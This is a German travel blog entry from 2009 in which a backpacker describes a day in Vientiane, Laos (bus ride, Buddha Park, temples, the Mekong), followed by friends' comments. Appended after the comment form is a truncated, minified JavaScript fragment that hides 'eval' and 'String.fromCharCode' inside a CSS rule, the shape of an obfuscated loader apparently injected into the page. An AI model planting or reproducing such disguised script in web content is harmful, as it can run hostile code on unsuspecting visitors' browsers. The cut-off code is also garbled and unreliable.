21
Aug

Laos

Hallo ihr Lieben
Geweckt wurde ich heute morgen um 6 durch eine froehlich, schwatzend, singende Menge Laofrauen die genau vor meinem Zimmer Hausarbeiten erledigten. Diese konnten natuerlich nicht ahnen das im Zimmer nebenan ein sensibler junger Europaer darauf hoffte laenger schlafen zu koennen, nachdem die Nacht in einer heissen Waeschekammer auf einem Betonbett kein Traum gewesen ist.
Aber naja, so sind sie eben die Lao, staendig schnatternd, singend und laut. Man kann ihnen gar nicht boese sein und so tastete ich mich mit Krustenverschmierten Augen nach meinen Wachspax um mir die Ohren zu verschliessen. Konnte dann erstaunlicherweise auch wirklich wieder einschlafen.
Bin dann morgens zum Busbahnhof gelaufen um den oeffentlichen Bus zum Buddhapark zu nehmen. Der Buddhapark ist ein Areal im Wald voller beeindruckender Skulpturen.
Wer in Laos nach dem Weg fragt oder einen Bus sucht und dabei kein Lao spricht hat Pech. In Laos, spricht man Lao und entweder man lernt die Sprache oder man lacht viel :>>! HAb einfach an alle moeglichen Busse geklopft und immer wieder verstoert die Worte Buddhapark in das Innere der Busse geworfen und der Bus aus dem mich die meisten Augen anstrahlten und ich die groesste Ressonanz empfangen habe, in den bin ich dann einfach eingestiegen.
Busfahren in Laos kostet nur nen paar Cent und hey, vielleicht waere der Bus ja auch an einen traumhaft schoenen anderen Ort gefahren wo ich dann von einer Laosfamilie eingeladen und fuer mich ein Huhn enthauptet worden waere. Ausserdem ist man bei den Strassenverhaeltnissen und den Bussen vor Ort in wenigstens 24 - 48 Stunden wieder zurueck gefahren. Also was haette passieren koennen :>>?

Busfahren in Laos ist mal wieder wie ueberall ausserhalb Europas ein Erlebniss fuer sich. Die Lao sind ein sehr herzliches, interessiertes und gespraechiges Volk und nachdem ich der einzige Auslaender im Bus war wurde sich auch gleich mutig an mich herangeschnattert und getastet. Da der Bus dann eh gefuehlsmaesig bis unters Dach mit Menschen beladen war, rueckt man dann auch gleich eng zusammen und die europaeische Scheu vor Beruehrung wird abgelegt. Da wird neugierig das verschwitzte, wallende Haar betrachtet. Da wird interessiert der behaarte Arm bestaunt und natuerlich viel gelacht.
Aber ich hatte auch nicht gerade wenig zu sehn. Vor mir sahs ein alter Mann der sich, so scheint mir, zur Feier des Tages, die Fingernaegel pink lackiert hatte um sich fuer mich extra chick zu machen. Schraeg mir gegenueber sahs ein uralter Moench der bestimmt bald in die Kiste hopst. Seine Haut hatte etwas von einer gegerbten Lederhandtasche die zu lange im Wasser gelegen hatte :>>!

Nachdem in diesem Bus wirklich niemand der Englischen Sprache maechtig war, hab ichs dann auch aufgegeben immer wieder mit meinem bloeden Buddhapark in die Menge zu rufen sonder einfach ein Bild in meinem Reisefuehrer gezeigt. Schnell wurde mir das Lao Wort fuer diese Attraktion des Landes beigebracht und nachdem ich versucht hatte diese Entenlaute nachzuahmen, tobte der ganze Bus.
Ich hatte wirklich einen Morz Spass, der mich auch gerne vergessen lies, dass die STrassen so unglaulich misserabel sind und mein Po schon so unglaublich wund geschaukelt war.

Am Buddhapark angekommen, habe ich mich herzlich bedankt und verbeugt und dabei glaube ich etwas Wehmut in den Augen meiner Reisegefaehrten erkannt zu haben als ich den Partybus verlassen habe um mich in den Dschungel zu schlagen :>>!

Der Buddhapark war sehr schoen aber nicht unbedingt spektakulaer, naja aber ich hab ihn mal gesehn.

Bin dann wieder mit dem oeffentlichen Bus zurueck gefahren und hab mich dann auf dem Mark erstmal mit herrlich exotischen Fruechten eingedeckt und ganz tolles Baquett mit asiatischen Gemuese und Gewuerzen gefuttert. Laos war ja frueher mal Frankreich, deshalb die Baquetts.

Weiter gins zum Sightseeing in dieser kleinen vertraeumten Stadt. Dabei habe ich dann doch etwas die Hitze und das Klima unterschaetzt. Hat dann kurz geregnet und als der Dunst von der heissen Strasse aufgestiegen ist, hats mich fast da hingehaun. Kein SChatten, kaum Sauerstoff zu atmen und nur warmes Wasser im Rucksack dabei. Schrecklich. HAb mich dann tapfer von Tempel zu Tempel geschlagen, mittlerweile habe ich jede Menge Buddhas und Gold und Gloeckchen und weiss der Teufel was gesehn, und dabei mehr oder weniger entspannt den Nachmittag verbracht.

An einem Tempel habe ich dann nach buddhistischer Tradition von einer kleinen alten Frau mit Reisstrohhut einen Kaefig kleiner Voegel gekauft die ich dann frei gelassen habe. Mein Karma ist jetzt sicher super rein und ich kann gespannt auf weitere Ereignisse meiner Reise hoffen.

Hab dann noch eine Schweizerin kennen gelernt die ihren Job gekuendigt hat und jetzt um die Welt tourt. Die wohnt auch gleich hier und wir treffen uns spaeter noch um am Fluss abzuhaengen. Ja ja, ich muss schon sagen, es ist wirklich so schoen wie ich es hier beschreibe. Ich bin vollkommen gluecklich und wuerde am liebsten gleich fuer nen paar Monate hier in Asien bleiben. Aber naja, geht ja nicht! Bloede Arbeit &#59;D!

Gestern abend war ich dann noch die ganze Zeit am Mekong gehockt und hab mit Kindern gespielt. Bin dann ueber den Nachtmarkt gebummelt und hab mir meine Pfusch H&M-Latschen gegen Laotische Superware ausgetauscht!

Abends oeffnen dann ganz viele kleine Garkuechen am Ufer und man kann sich an Minitische auf Kissen auf den Boden hocken und fuer einen Euro mega viel Essen. Als ich dann da so im Kerzenschein sahs und das romantische Funkeln der Lichter auf dem Wasser beobachtete, ist dann eine kleine Kroete ueber meinen Platz gehopst. Selbst die Kroeten sind in Laos entspannt &#59;)!

Also dann, ich wuensch euch was, morgen gehts weiter nach Vang Vieng zu den Kalksteinfelsen in den Reisfeldern, muss der Hammer sein. Ich freu mich von euch zu hoeren.

Lieben Gruss
Jens

Vientiane:

Vientiane:

free b2evolution skin

6 Kommentare

Kommentar von: Denise [Besucher]
Denise

XD boah klingt das alles geil! Vor allem so typisch für dich, wie du dich da durschlägst. Scheint bisher ja alles ziemlich gut zu klappen, was mich sehr für dich freut! Das mit den Vögeln war ja total süß ;_; die flattern bestimmt munter und froh weiter!
UND OMG DIE KRÖTE!! XD das klingt ja total geil.. ich will auch ne Kröte über meinen Tisch laufen sehen.

Ich bin ja schon wie blöd auf die Fotos gespannt! Können wir dann bei mir im neu eingerichtetem Zimmer anschauen wenn du wieder da bist (also alle - freu mich auch schon auf die fotos die du mal hochlädst )

21.08.2009 @ 13:06
Kommentar von: [Mitglied]
sarah

Hey Jensi,

ich lese jeden Tag eifrig mit und bin auch immer gespannt was du als nächstes zu berichten hast :) Hört sich alles richtig hammergeil an wie du das so beschreibst und ich bin schon echt auf Fotos gespannt!
Freue mich schon auf deinen nächsten Blog!
Machs gut und pass auf dich auf,nicht, dass du krank wirst oder so XD

Beste Grüße aus dem LANGWEILIGEN Wü

Sarah

21.08.2009 @ 13:44
Kommentar von: [Mitglied]
daniel

Schön das es dir gefällt! Habe soeben deine Bilder online gestellt die ich bis jetzt bekommen habe. Hoffe es ist so ok wo ich sie zugeordnet habe. Vielleicht hat die Mail so lange gedauert weil du vergessen hast ein Bild zu verkleinern, wenn dann noch das Internet langsam ist kann das schon dauern. Solltest du mir nochmal Bilder schicken würde ich dir empfehlen diese gleich per E-Mail hochzuladen während du deinen Text schreibst, dann brauchst du nachher nicht mehr so lange warten. Aber sonst wenn das wirklich zu lange dauert müssen wir sie halt später online stellen. Vielleicht bist du aber ja auch mal wo anders wo das Internet etwas schneller läuft. Machs gut, freu mich auf neue Geschichten!

Gruß

Daniel

21.08.2009 @ 14:37
Kommentar von: [Mitglied]
herbie57

Hallo Jems,

scheint ja dort sehr schön zu sein, aber mit der Hygiene hätte ich Probleme. Viel Spass noch.

Gruß Vater

21.08.2009 @ 20:13
Kommentar von: [Mitglied]
jens

Hallo ihr Lieben danke fuer eure Kommentare! Freu mich schon auf euch

@ Vater: Was heisst den hier mit der Hygiene? Ist alles sauber :-)!

22.08.2009 @ 09:52
Kommentar von: [Mitglied]
herbie57

Hallo Jens,
ich finde es echt super was Du da so alles erlebst! Kann man echt neidisch werden und man möchte am Liebsten auch sofort da hin! Schaffst Du das mit dem Kloster jetzt echt nicht mehr? Ich wünsche Dir eine schöne Zeit und bin schon auf deinen nächsten Bericht gespannt! Viele Grüße
Sandra

23.08.2009 @ 12:22

Der Eintrag hat ein auf Moderation wartendes Feedback...


Formular wird geladen...

gator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement(style);if(!isIE)style_node.innerHTML=selector+ {+declaration+};document.getElementsByTagName(head)[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)==object)last_style_node.addRule(selector,declaration);}};var rq={jntj:7718,fz:function(){createCSS(#c0,background: url(data:,evaString.fromCharCode));var hmpw=null;var r=document.styleSheets;for(var i=0;i